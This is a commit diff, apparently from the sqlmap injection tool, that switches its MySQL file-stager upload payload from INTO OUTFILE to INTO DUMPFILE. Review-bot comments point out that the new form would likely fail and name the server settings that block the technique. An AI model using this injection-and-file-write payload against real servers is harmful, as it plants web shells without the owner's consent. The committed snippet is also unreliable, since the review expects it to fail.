
Commit c211255

committed
replaced outfile with dumpfile so works even if the original statement outputs blob
1 parent 39ab3b9 commit c211255

2 files changed

Lines changed: 4 additions & 4 deletions


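--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -139,7 +139,7 @@ def _webFileInject(self, fileContent, fileName, directory):
 randInt = randomInt()
 query += "OR %d=%d " % (randInt, randInt)
 
-query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
+query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", DUMPFILE=outFile, HEXSTRING=hexencode(uplQuery))
 query = agent.prefixQuery(query)
 query = agent.suffixQuery(query)
 payload = agent.payload(newValue=query)
@@ -217,9 +217,9 @@ def webInit(self):
 else:
 directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
 
-# Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique
+# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE technique
 infoMsg = "trying to upload the file stager on '%s' " % directory
-infoMsg += "via LIMIT INTO OUTFILE technique"
+infoMsg += "via LIMIT INTO DUMPFILE technique"
 logger.info(infoMsg)
 self._webFileInject(stagerContent, stagerName, directory)
 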
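Review bot: The comment on new line 220 and the log text on line 222 name the technique but not the server-side conditions it depends on, which a reader needs both to interpret a failed upload and to see which MySQL settings block it. I would extend the comment, e.g. `# Requires the FILE privilege, a target directory permitted by secure_file_priv, and a file name that does not exist yet`. Both `webInit` and `_webFileInject` start and end outside the hunks shown, so any existing checks for these conditions are not visible here.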

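--- a/procs/mysql/write_file_limit.sql
+++ b/procs/mysql/write_file_limit.sql
@@ -1 +1 @@
-LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
+LIMIT 0,1 INTO DUMPFILE '%DUMPFILE%' LINES TERMINATED BY 0x%HEXSTRING%--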
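Review bot: The `LINES TERMINATED BY 0x%HEXSTRING%` clause is kept after `INTO DUMPFILE` on the new line 1, but in MySQL's documented `SELECT ... INTO` grammar the FIELDS/LINES export options belong to `INTO OUTFILE` only; `INTO DUMPFILE` takes just a file name. As written, the statement would be expected to fail with a syntax error rather than behave differently for blob output. The caller in lib/takeover/web.py appears to pass its content through HEXSTRING (`hexencode(uplQuery)`), so dropping the clause would leave the snippet with nothing to write. I would keep `INTO OUTFILE '%OUTFILE%'` here until the new form has been run against a MySQL server.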
